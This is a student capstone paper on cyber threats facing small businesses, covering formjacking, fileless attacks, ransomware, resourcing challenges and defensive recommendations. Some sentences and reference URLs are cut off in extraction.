Professional Documents
Culture Documents
Rowenapagarigan Capstonepaper
Rowenapagarigan Capstonepaper
Small and Midsize Businesses: Risk Assessment and Cyber Threat Fortification
by
Rowena Pagarigan
Spring 2019
Contents
Contents 2
Abstract 3
1. Introduction 4
2. SMB Definition 5
3. Small Business Profiles 6
3.1 Non-employer Profile 6
3.2 Employer Profile: Less Than 20 Employees 7
4. Risk Assessment 7
4.1 Formjacking 8
4.2 LotL and Fileless Attacks 9
4.3 Ransomware 11
5. Challenges 13
5.1 Insufficient Personnel and Budget 13
5.2 Decentralized Information 14
5.3 Shadow IT and Insider Threat 15
6. Plan of action 17
6.1 Framework and Guidelines 17
6.2 Talent and Training 18
6.3 Budget 20
6.4 BYOD and IoT 21
6.5 Continuous Education 21
7. Conclusion 22
References 24
Rowena Pagarigan - IS499 !3
Abstract
Small to medium businesses (SMBs) are increasingly faced with enterprise-size cyber threats.
Cyber attacks are not limited to sophisticated hackers anymore with the rise of cybercrime-as-a-
service platforms in the dark web. Amateur cybercriminals with no coding experience can
simply purchase services in prepackaged kits and deploy them at chosen targets with less than
optimal security infrastructures and policies in place. This research defines two types of small
business profiles (employer and non-employer) in order to maintain the scope and clarity of the
overall impact that an incident and breach can have on these establishments. In order to support
the hypotheses that SMBs, in general, do not feel that they are a target for cybercriminals and
that both SMB profiles share similar challenges with minimal situational variations, the research
performed within this paper uses statements and data from a variety of sources: mainly, recent
existing white papers and surveys on the subject of SMBs and cybersecurity. This study also
provides general recommendations or plan of action that profiled businesses can implement to
1. Introduction
Cyber threats are often associated with attacks on larger companies, easily recognizable
not only in brand but also in reputation. This can be attributed to the amount of media attention
these data breaches receive in respect to the sheer amount of affected individual accounts
impacted as a result. A large-scale data breach could result in multiple layers of damage to the
target organization — from having to recover from a tarnished reputation, losing the trust and
confidence of all stakeholders, and the financial burden of containing the incident as well as
functionalities. Depending on the sector and industry affected, another consequence could be
As an indirect result, small and medium-sized businesses might not feel that they are
likely to be the targets of a cyber attack since the perceived pay-off for the attacker would not be
"Thirty-five percent of employees and 51 percent of leaders are convinced their business
is not a target for cybercriminals" (Switchfast, 2018, p. 3) according to a report which surveyed
In truth, small businesses are just as susceptible to cyber attacks, if not more. The EMEA
(Europe, Middle East, and Africa) Chief Strategist for Symantec, Sian John, stated that "nearly
forty-three percent of cybercrime targets small business" (Thompson, 2019a) more specifically
One of the key findings from the Internet Security Threat Report by Symantec (2018)
was "the US was the most targeted country in the past three years, accounting for 27 percent of
2. SMB Definition
The terms SMB (Small and Midsize Business) and SME (Small and Medium-sized
Enterprises) are often interchangeable. Definitions for small business can vary depending on the
source. For the purpose of this paper, the definition will be further narrowed down and redefined
in an effort to not only remain within the scope but also to provide greater value in terms of
There are 28.8 million small businesses in the US as reported by the Office of Advocacy
in the United States Small business Profile conducted by SBA.gov. This translates to 99.7% of
classification system using codes (North American Industry Classification System Codes) that
groups industries and subindustries (SBA.gov, 2016). Each category has a predefined
requirement either based on number of employees of a firm and / or average annual receipts.
This system was designed in order to give smaller firms an opportunity to compete with larger
corporations. For example, these standards are used as a basis to qualify for loans as well as
Office of Advocacy defines a small business as “an independent business having less than
500 employees” (US Small Business Administration Office of Advocacy, 2016). That qualifier
number does not make it seem like a small business at all. It is safe to assume that the term small
business still elicits the image of an old-fashioned mom and pop type of operation — typically
Rowena Pagarigan - IS499 !6
family operated and definitely composed of less than 500 employees. In New York State, small
business is defined as “one which is resident in this state, independently owned and operated, not
dominant in its field and employs one hundred or less persons” (NYState.gov, n.d.). According
to the last recorded small business survey results from 2016, almost 25 million small business
establishments had non-employer status (US Census Bureau, 2018). For those with employer
status, “firms with fewer than 20 workers made up 89.0 percent” (SBE Council, n.d.) based on
This research will focus mainly on the cybersecurity vulnerabilities and challenges facing
small businesses with less than 20 employees as well as those who have non-employer status.
My initial assumption and hypothesis is that each segment will have both common and varying
(yet closely related) sets of obstacles based on key factors unique to each one. Mainly, lack of
resources in terms of adequate staffing and ample financing to support critical security operations
and maintenance as well as recovery efforts following an actual cybersecurity incident. Another
hypothesis is that small businesses assume that they are targeted less than larger corporations by
cyber criminals. For the remainder of this paper, the segmented businesses will be referred to as
Simply put, non-employers are any small business with no paid employees. Based on
data from the Non-employer Fact Sheet (SBA.gov, 2018a), the typical non-employer firm is
owned by a woman (40%), with a third owned by minorities. 16% are under 35 years of age.
It has also been reported that one-third of non employers surveyed did not need any startup
capital and for those remaining two-thirds that did, 79% used their “personal or family
savings” (SBA.gov, 2018b). Lastly, “non-employer firms typically earn around $47,000
Exact data pertaining to small businesses with less than 20 employees are more
fragmented. For this reason, the data set to be used for this profile will be based on the Babson
College Report, The State of Small Business in America 2016. The answers to the survey were
based on a respondent pool consisting of 1,679 small businesses across the United States with
the following qualifiers: participants must be “in business for two or more years, a minimum of
four employees, and annual revenues of $150,000 to $4 million” (Babson College, 2016, p. 40).
The majority of small business employer firms utilize financial institutions as their
primary source of capital. On average, the requested loan amount equates to $100,000. Actual
received funding is only typically $40,500. Another popular method of securing capital is via
credit cards even with its credit size limitations and the risks associated with high interest rates.
The typical business owner profile for this data set are as follows: Caucasian male, over
50 years of age.
4. Risk Assessment
According to the 2018 Data Breach Investigation Report, out of 53,000 incidents and
2,216 confirmed data breaches, 58% of the victims were small businesses (Verizon, 2018, p. 5).
Microsoft Office programs and Windows-based applications as the basis of SMB attacks in the
Rowena Pagarigan - IS499 !8
last 12 months (Bayern, 2018). Cyber attack methods typically go through its own lifecycle and
evolve quicker than most businesses can protect themselves. Certain attacks tend to reach its
peak and is replaced with a newer, more sophisticated way of reaching the same end-game. This
is a logical way of progression since once a cyber threat reaches a point of becoming
mainstream, companies (both large and small) are more willing to and are able to combat this
specific type of attack. This means that cyber criminals either need to move on to their next
4.1 Formjacking
Formjacking occurs when bad actors inject a code on a website (typically an e-commerce
site) which captures payment information from unsuspecting customers. From the customer’s
perspective, it looks just like a normal transaction. By the time the user realizes their personal
data has been compromised, the damage has already been done.
"Smaller businesses are a target because they're less likely to have the more sophisticated
protections that larger sites have” (Rash, 2019a). Common entry points for these type of attacks
are compromised third-party add-ons, surveys and chatbot features that are placed on the website
with the purpose of helping the customers. Another way in would be through server
vulnerabilities or unauthorized access using the web admin's credentials. It is important to note
that formjacking is not restricted to credit card info theft. It is also used for stealing anything
that requires forms to be filled out, such as user log-in credentials and other forms containing
Website owners can combat this by using SRI (Subresource integrity) tags. This method
is meant to check the integrity of the site when viewed from the customer's browser. If anything
Rowena Pagarigan - IS499 !9
has been altered during transmission of the message from point A to point B, it would be
identified. A hash is a cryptographic algorithm function that serves as a type of unique signature
for a text or a data file. It appears as a string of alphanumeric combination. The SRI tag reviews
that the original hash generated from the source matches the hash that is generated when it is
received by the intended viewer, which in this case is the customer. If the user's browser detects
any anomalies, "the browser must refuse to execute the script or apply the stylesheet, and must
instead return a network error indicating that fetching of that script or stylesheet failed" (Mozilla,
n.d.).
Other ways of mitigation that can be performed by small businesses include being
mindful about which third-party features they are implementing on their site. Regular
maintenance should be scheduled and performed which includes website code reviews, web
server security analysis, keeping operating systems up to date and patched, and implementing
staff training in regard to privileged user access. Outbound traffic should also be monitored to
ensure that messages are going to the proper destination rather than be rerouted to an
unauthorized party.
Unfortunately, the business owners themselves can be the main reason for not addressing
this type of cyber threat. "Website owners are reluctant to take measures to prevent formjacking
because they're concerned that it might disrupt revenue flow” (Rash, 2019b).
A rising trend in cyber attack techniques involve fileless malware. It has also been
referred to as a zero-footprint attack as well as Live-off-the-Land (LotL) attack due to its ability
to enter a machine undetected. This method uses trusted out-of-the-box tools such as macros and
Rowena Pagarigan - IS499 !10
various scripts to carry out an attack. It has the ability to remain in the infected system in order
to execute malicious payload using native Microsoft functionalities such as XML, Dynamic Data
Instrumentation (WMI) then move laterally to other machines within the network to duplicate the
same process. “In 2018, Microsoft Office files accounted for almost half (48 percent) of all
malicious email attachments, jumping up from just 5 percent in 2017” (Symantec, 2019, p. 17).
Based on LotL attack’s method of delivery, one could say that a logical mitigation tactic
would be to simply disable these native Windows functions. The issue is that while in theory,
this would be effective in reducing the occurrence of fileless attacks, many of the executable
For instance, DDE protocols “sends messages between applications that share data and
uses shared memory to exchange data between applications” (Kennedy & Satran, 2018). Used
by commonly accessed applications such as Microsoft Word, Excel, and Visual Basic, this
protocol “can be used to implement a broad range of application features that include linking to
Another Windows-native tool that has seen a significant spike in being utilized in first-
stage malware is PowerShell. This tool grants administrators a wide-range of access controls to
manage enterprise networks. Disabling this functionality would disrupt business operations and
A successful campaign would play out as follows: Using spear phishing (emails that
target specific individuals or departments) techniques, a bad actor sends Microsoft Office lure
Rowena Pagarigan - IS499 !11
documents to multiple targets. Upon opening the email, one of the recipients is prompted to
enable content. The user enables content which then activates the DDE protocol. The DDE
protocol works remotely to run commands and tools on memory, with each action invoking
another executable designed to either collect information (e.g., credentials) or create a backdoor
entry that can be reused to access that workstation again. This is a typical characteristic of an
Advance Persistent Threat (APT) which is “a prolonged and targeted cyberattack in which an
intruder gains access to a network and remains undetected for an extended period of
It has proven to be an effective mode of entry that starts with a first-stage malware,
unleashing a second-stage payload using native tools. The threat is magnified due to its ability to
hide in plain sight. Having tasks and scripts run on memory obfuscates the actual exploits
4.3 Ransomware
Ransomware. While recent articles state that ransomware attacks have decreased and being
replaced by newer methods, it is important to note that such articles are likely referring to the
Ransomware is malware designed to deny access to data, divulge sensitive data (or both)
unless a ransom is paid. This can affect mobile devices, individual systems or workstations, or
an entire network and all of its interconnected assets. The point of entry for ransomware varies,
meaning whatever means necessary to get the payload delivered. It can be delivered as a
secondary attack via LotL techniques. 79% of the participants in a Ponemon Institute report
Rowena Pagarigan - IS499 !12
(2018) cited phishing and some type of social engineering as the source of entry for their
Remote Desktop Protocol (RDP) passwords. RDP is a Microsoft specific protocol that enables
remote connection to a workstation within the same network. It is a commonly used feature in
office settings for routine maintenance, troubleshooting, virtual desktops and applications.
Attackers could either brute-force their way through, use purchased stolen credentials, or
manually steal credentials in systems that have weak passwords by using open-source tools such
as MimiKatz.
All three techniques have been used to deploy the SamSam variant of ransomware on
organizations of all sizes. One of its larger victims is the IT Systems of the City of Atlanta in
which the group behind SamSam demanded $51k in bitcoin to restore essential and critical
services to the city. The City of Atlanta did not pay the ransom, but in order to regain control of
the hijacked system as well as to fortify it against similar attacks, it cost $2.7 million dollars with
nefarious groups and individuals have turned their attention to SMBs. "About 70 percent of
ransomware attacks in 2018 targeted small businesses, with an average ransom demand of
$116,000" (Davis | Health IT Security, 2019). Just recently, Michigan-based Brookside ENT &
Hearing Services became "the first health care provider in the nation to shut its doors for good
because of a ransomware attack” (Carlson, 2019). The two doctors who ran the clinic refused to
pay the $6,500 ransom to unlock their data which rendered their business inoperable. They have
since reported the incident to the FBI. While cybersecurity experts think their data might still be
Rowena Pagarigan - IS499 !13
recoverable, reputable data forensics experts and recovery team will need to access the infected
5. Challenges
The challenges faced by both employer and non-employer profiles are similar to large
enterprises — mainly constraints on resources as well as human error. However, these issues
The participants in the 2018 Ponemon Institute Study were asked what they thought were
the challenges that kept their organization's IT security from being fully effective. The top three
The SMEs that fall under the smaller range will typically have employees that wear many
hats and perform multiple and oftentimes overlapping roles. The smaller the number of
personnel is, the chances of each one being responsible and accountable for multiple processes
increases. Insufficient staffing is directly related to insufficient budgets. Employer Profiles will
more than likely only have one individual handling all IT-related duties or outsource the task
when needed, while Non-Employer Profiles will have no other option but to handle it themselves
or outsource if the budget allows. Cybersecurity job salaries typically fall in the higher-end of
the spectrum, far beyond what the profiles are able to compensate. “Instead, they assign these
responsibilities to an employee who works on these issues on a kind of part-time basis” (US
Rowena Pagarigan - IS499 !14
Senate: Committee on Small Business and Entrepreneurship, 2018, p. 5-6). As a result, these
personnel will not only experience obstacles related to overallocation but will also be lacking the
Employees that are delegated cybersecurity duties on a part-time basis will not have the incentive
to obtain cybersecurity certifications that require both time and financial commitments.
the common reasons given by small businesses for not having a dedicated cybersecurity plan or
staff is “Cybersecurity is expensive and I cannot afford it” (Abate, 2018, as cited in US Senate:
Committee on Small Business and Entrepreneurship, 2018, p. 27). Cybersecurity expenses take
up a larger percentage of the Profiles’ operational budget compared to larger firms since they do
not have the economies of scale that a large organization have in terms of acquiring technology
solutions per user or in bundles. Larger organizations have the advantage of volume-based
discounts.
Besides lacking qualified cybersecurity personnel, another factor that compounds the
challenge is not fully understanding what needs to be done. Unfortunately, seeking answers
online only results in too much fragmented information that is very difficult to find or too vague
to translate into practical activities. Before the Main Street Cybersecurity Act was signed into
law on August 14, 2018, the cybersecurity framework provided by National Institute of
Standards and Technology (NIST) was the main resource available for small and large businesses
alike. The amount of information that the typical Profile business owner or part-time
cybersecurity staff would have to sift through was cumbersome and impractical. Other resources
Rowena Pagarigan - IS499 !15
are also prone to poorly organized information that can be overwhelming to gather, synthesize,
and convert into organizational practices. For instance, the US Small Business Administration
(SBA) site mostly provides resources which leads to a handful of external links leading to other
Currently, the cybersecurity page on the FCC site is difficult to find form the home page
and can only be found by searching for the term “cybersecurity” in the search box, which lists it
as the fourth result on the page. The FCC page also provides a downloadable Cybersecurity Tip
Sheet which contains inaccurate advice such as — hiding your router’s SSID helps secure your
Wi-fi network. An SSID is merely an identifier for the access point and is not a security feature.
A determined hacker can easily discover a hidden SSID by utilizing a network analyzer. “A non-
broadcast network is not undetectable. Non-broadcast networks are advertised in the probe
requests sent out by wireless clients and in the responses to the probe requests sent by wireless
APs” (Davies, 2007). This means that depending on your device and settings, hiding your
network name on the router will inadvertently expose your network name since your device will
attempt to broadcast and ping for your router wherever you may be. A more practical advice
could be — ensure that your router is set to a WPA2 encryption and not a WEP which can be
While the term shadow IT has an ominous, clandestine ring to it, it does not necessarily
refer to a secret band of personnel who are intentionally wreaking havoc on a company’s
setting which has not been approved for use or is beyond the scope of control of the IT
department or individual without the knowledge of the IT or security group within the
These can include the use of physical storage devices (USB drive), messaging apps
(WhatsApp, Facebook Messenger), personal devices (mobile phone, tablet), as well as IoT
devices (Amazon Echo). If an organization’s staff brings in a mobile device and jumps on the
company’s wifi to minimize data charges, this is considered unauthorized unless the IT or
security department has an Acceptable Use Policy (AUP), a Mobile Device Management
(MDM), or a Bring Your Own Device (BYOD) Policy in place that specifically addresses it. It is
safe to assume that if most larger firms do not have a detailed mobile device management plan
established, then small businesses will certainly not have one in place.
productivity and collaboration, but these technologies add an attack layer that bad actors can
exploit and exfiltrate data out of. There is often a trade-off between convenience and security
Insider Threat can refer to both malicious intent or human error. 60% of company data
breaches have been attributed to negligent employees or contractors (Ponemon Institute, 2018, p.
4). A secure workstation and network means nothing if an employee writes their user credentials
on a sticky note and adheres it on their monitor for any passerby to see. Accessing work email or
documents via mobile device connected to a public wifi at a coffee shop is another example of
unintentional insider threat. “70% of SMB respondents have logged onto public wifi using their
Rowena Pagarigan - IS499 !17
work devices at places such as airports, airplanes and coffee shops” (AppRiver, 2019). Public
wifi allows cybercriminals to carry out man-in-the-middle (MitM) attacks in which they position
themselves between the user (victim) and the open network (access point) and use tools to sniff
out the transferred data between the public wifi and your device. In short, they are
eavesdropping and capturing the transmission that occurs between user and access point to
6. Plan of action
Profiles need to make every effort to create a framework that is suitable for their
organization. There is a misconception that cybersecurity falls only within the purview of the
person responsible for IT duties when in actuality the entire firm and all of its personnel have to
be accountable. Profiles with an existing cybersecurity policy can use the following resources to
update their current framework. Those who do not have one in place can use any of the
cyber-related risks.
Profiles should create a cybersecurity policy or update an existing one. NIST has a Small
Business Cybersecurity Corner page with planning guides that can serve as templates. The page
The DHS: Stop. Think. Connect.™ Toolkit located in the Publications Library currently
has a list of PDF guides organized by Cyber Topic on the bottom of the page. These provide a
good starting point for those with minimal IT experience who are seeking general information
since the format is easily digestible and not overwhelmingly technical. On the top of the page,
Rowena Pagarigan - IS499 !18
materials are also divided based on its target audience. Clicking on the small business link takes
the user to another page with a short list of additional resources, both internal and external links.
The National Cybersecurity and Communications Integration Center’s C3VP Page has a
Cybersecurity Resources Road Map with a helpful infographic divided in tiers containing links
National Initiative for Cybersecurity Careers and Studies (NICCS) has a Cybersecurity
Workforce Development Toolkit, a downloadable PDF with “resources and information you need
to plan, build, and advance your cybersecurity workforce” (NICCS, 2016, p. 1). This
Stakeholder Engagement and Cyber Infrastructure Resilience one sheet works well in
The National Cyber Security Alliance’s CyberSecure My Business™ page has well-
organized multimedia resources such as a Technology Checklist with relevant, accurate, and
actionable practical information. The same site has a Resources Library with helpful tip sheets
Better Business Bureau (BBB) has a useful page with a list of resources for small
Lastly, Profiles should explore additional cybersecurity resources provided by their state
government and local jurisdiction to supplement the ones mentioned above. As a general rule,
knowledge seekers should look for recency within the resources. Outdated and undated
Employer Profiles with dedicated IT personnel should review their current cybersecurity
health by performing a self-audit of assets, data, risks, resources, mitigation and recovery tactics
with stakeholders. Leadership must ensure that they have personnel who is accountable and
responsible for cybersecurity-related tasks only. Threat prevention is not a static effort in which
occasional software updates or virus scanning is deemed as sufficient. Cyber threats are
constantly evolving and in order to mitigate potential risks, organizations must exercise vigilance
in their efforts.
This places a greater onus on Non-employer Profiles who already have the burden of
Security Service Providers (MSSP) who specialize in monitoring and management of systems
and devices. Owners of non-employer businesses can also take this challenge as an opportunity
to educate themselves on cyber protection since they have an advantage of having a less complex
Profile can also choose to go with the outsourced MSSP route or invest in training an employee
The fortification of both Profiles is not limited to having access to a security expert to
oversee operations. It also means collaborating with all departments to ensure that a layered
employee falls victim to social engineered techniques which exploits human behavior. Profiles
should strive to educate themselves and their staff with current and ongoing threats, if nothing
Rowena Pagarigan - IS499 !20
else just to create a sense of awareness. Cybersecurity is only as strong as the weakest link, and
6.3 Budget
Profiles lack the sufficient budget to allocate towards a security initiative but it should not
prevent them from implementing best practices for systems hardening. Even large enterprises
“spend less than 10 percent of their IT budget on infosec” (Fruhlinger, 2018). Both employer
and non-employer profiles must learn how to use the tools that they currently have at their
disposal. Profiles might not be able to afford or have the personnel to manage an IDS (Intrusion
Detection System) / IPS (Intrusion Prevention System) but even a commercial off-the-shelf
firewall and antivirus solutions is better than nothing. A Business.com article stated “the
majority of small businesses have invested in antivirus software and firewall protection (81 and
76 percent, respectively)” (Rinaldi, 2019). Companies such as Symantec have affordable small
business solutions which covers workstations as well as mobile devices on both major platforms
Another simple system hardening practice is proper configuration of the router including
passwords (many users still leave the default password), guest wifi setup and management, as
well as adding Virtual Private Network (VPN) services for businesses that utilize remote access.
devices in order to have the most recent security features and patches is another good habit to try
identity, usually for logins or other transactions. Encrypting hard drives and emails are also good
For Profiles who deal with accepting credit cards / digital payments such as e-commerce
operations, or those who store confidential or sensitive customer information including but not
In the case of an incident, data loss, theft or breach, this will at least give some type of assistance
It is advisable that Profile security policies address a common trend in the work place —
Bring Your Own Device (BYOD), which is an umbrella term that can also include IoT devices.
Personal devices brought in to the workplace not provided by the company adds on to the
company’s attack surface with potential entry points. BYOD also contributes to the shadow IT
security without sacrificing the full potential and value that BYOD technologies might bring into
the organization. This will include user education in how to operate their mobile devices
responsibly both during and outside office hours. Creating an on-boarding process for BYOD
should be one of the primary objectives. “66% of IT professionals don’t know how many
devices employees bring into work, while an estimated 84% of companies have experienced an
IoT-related breach” (InfoSec Institute, 2018). An invisible device cannot be managed in the
network.
Employer Profiles can integrate cybersecurity awareness within the company culture by
conducting dedicated meetings on the subject or allocating a portion of every meeting to review
relevant and recent topics. Internal newsletters can also be utilized to deliver information
containing news, tips, videos, and infographics. Informational one sheets can be posted
throughout the establishment as well and updated with fresh content on a scheduled release.
Employer Profiles who have the budget for Pen Testers (Penetration Testers), should consider
acquiring their services to test the security of their organization through ethical hacking
7. Conclusion
As the cyber threat landscape continues to evolve faster than businesses can keep up, it is
crucial for Profiles to take these imminent threats seriously and its total impact on their
organization. Small businesses assume that they are less of a target since they represent less of a
financial gain to cyber criminals. This assumption can give Profiles a false sense of security and
a lax attitude towards security in general. The most recent Q2 CyberIndex Threat survey
published by AppRiver revealed a pattern between larger SMBs (150-250 employees) and
smaller SMBs (1-49 employees) — “SMBs could be underestimating their real cyberthreat risks”
(2019). In truth, they are in just as much of a risk as larger enterprises with the added obstacle of
resource constraints.
Moreover, both Profiles share common sets of obstacles in terms of constraints in both
personnel and budget as well as not knowing where to start and how to go about fortifying their
businesses. To make matters worse, resources and organizations that are designed to assist
Rowena Pagarigan - IS499 !23
SMBs are difficult to navigate and often give vague and convoluted advice that is difficult to
synthesize.
Improvements have been made to reliable sources of information such as NIST and SBA,
but it is nowhere near where it should and can be. Small business owners will need to be
proactive and do their due diligence in order to remain vigilant. Persistent and dynamic threats
References
AppRiver. (2019). Cyberthreat index for business Q1 2019. Retrieved from https://
www.appriver.com/files/documents/cyberthreatindex/AppRiver-Cyberthreat-Index-for-
Business-Survey-exec-summary_FINAL.pdf
AppRiver. (2019). Cyberthreat index for business Q2. Retrieved May 6, 2019, from https://
www.appriver.com/files/documents/cyberthreatindex/Q2-2019-AppRiver-Cyberthreat-
Index-for-Business-Survey%20Report.pdf
Babson College. (2016). The state of small business in America. Retrieved from http://
www.babson.edu/media/babson/site-assets/content-assets/images/news/announcements/
goldman-10ksb-report-2016.pdf
Bayern, M. (2018, August 21). SMBs at higher risk of sophisticated cyberattacks: here are the
sophisticated-cyberattacks-here-are-the-top-threats/
Carlson, J. (2019, April 6). All of records erased, doctor's office closes after ransomware attack.
after-ransomware-attack/508180992/
Cisco.com. (n.d.). What Is shadow IT?. Retrieved May 6, 2019, from https://www.cisco.com/c/
en/us/products/security/what-is-shadow-it.html
CISO Mag. (2019, February 25). Cyber criminals cash in on millions with formjacking: ISTR.
formjacking-istr/
Rowena Pagarigan - IS499 !25
Davies, J. (2007, April 19). Non-broadcast wireless networks with Microsoft Windows.
bb726942(v=technet.10)#EDAA
Davis | Health IT Security, J. (2019, March 27). 71% of Ransomware attacks targeted small
attacks-targeted-small-businesses-in-2018
Fruhlinger, J. (2018, May 29). The state of IT security, 2018. Retrieved from https://
www.cio.com/article/3274588/the-state-of-it-security-2018.html#slide7
InfoSec Institute. (2018, August 23). Security issues in edge computing and the IoT. Retrieved
from https://resources.infosecinstitute.com/security-issues-in-edge-computing-and-the-
iot/#gref
Kennedy, J., & Satran, M. (2018, May 30). About Dynamic Data Exchange. Retrieved from
https://docs.microsoft.com/en-us/windows/desktop/dataxchg/about-dynamic-data-
exchange
Web/Security/Subresource_Integrity
NICCS. (2016). Cybersecurity workforce development toolkit. Retrieved from NICCS / DHS
website: https://niccs.us-cert.gov/workforce-development/cybersecurity-resources/
cybersecurity-workforce-development-toolkit
NIST - CSRC. (2018, March 29). Access control policy and implementation guides.
Implementation-Guides
Rowena Pagarigan - IS499 !26
NYState.gov. (n.d.). Section 131: Definition of a small business. Retrieved from https://
www.nysenate.gov/legislation/laws/COM/131
Ponemon Institute. (2018, November). 2018 State of cybersecurity in small & medium size
Report.pdf
Rash, W. (2019, February 27). You need to protect your website against formjacking right now.
website-against-formjacking-right-n
Rinaldi, A. (2019, January 14). The Role of IT in smb cybersecurity. Retrieved from https://
www.business.com/articles/its-role-in-cybersecurity/
Rouse, M., & Rosencrance, L. (2018, July). What is advanced persistent threat (APT)?.
persistent-threat-APT
SBA.gov. (2016, February 26). Small business size standards. Retrieved from https://
www.sba.gov/sites/default/files/files/Size_Standards_Table.pdf
default/files/advocacy/Nonemployer-Fact-Sheet.pdf
SBE Council. (n.d.). Facts & data on small business and entrepreneurship. Retrieved from http://
sbecouncil.org/about-us/facts-and-data/
Stewart, B., & Charlton, D. (2019). Cyber attack inevitability: the threat small & midsize
2019_01.31_cyber_whitepaper_chubb_r3.pdfen/_assets/doc/
2019_01.31_cyber_whitepaper_chubb_r3.pdf
Switchfast. (2018). Cybersecurity mistakes all small business employees make, from entry level
Content%20Downloads/Switchfast_SMB_Cybersecurity_Report.pdf
Symantec. (2018). Internet security threat report (23). Retrieved from http://
images.mktgassets.symantec.com/Web/Symantec/%7B3a70beb8-
c55d-4516-98ed-1d0818a42661%7D_ISTR23_Main-FINAL-APR10.pdf?aid=elq_
Symantec. (2019). Internet security threat report (24). Retrieved from https://
www.symantec.com/content/dam/symantec/docs/reports/istr-24-executive-summary-
en.pdf
Thompson, M. (2019, January 24). Why cybercrime targets small business. Retrieved from
https://smallbiztrends.com/2016/05/cybercrime-targets-small-businesses.html
TrendMicro. (2017, November 22). DDE: What it is, what it does, and how to defend against
security/news/threat-landscape/dde-what-it-is-what-it-does-and-how-to-defend-against-
attackers-who-may-exploit-it
U.S. Census Bureau. (2018, June 21). U.S. 2016 nonemployer statistics. Retrieved from https://
factfinder.census.gov/faces/tableservices/jsf/pages/productview.xhtml?
pid=NES_2015_00A1&prodType=table
U.S. Senate: Committee on Small Business and Entrepreneurship. (2018). Preparing small
business for cybersecurity success (S. Hr. 115-300). Retrieved from Committee on Small
Rowena Pagarigan - IS499 !28
CHRG-115shrg30630/pdf/CHRG-115shrg30630.pdf
U.S. Small Business Administration Office of Advocacy. (2016, June). SBA: Frequently asked
FAQ-2016_WEB.pdf
publication/324455350_2018_Verizon_Data_Breach_Investigations_Report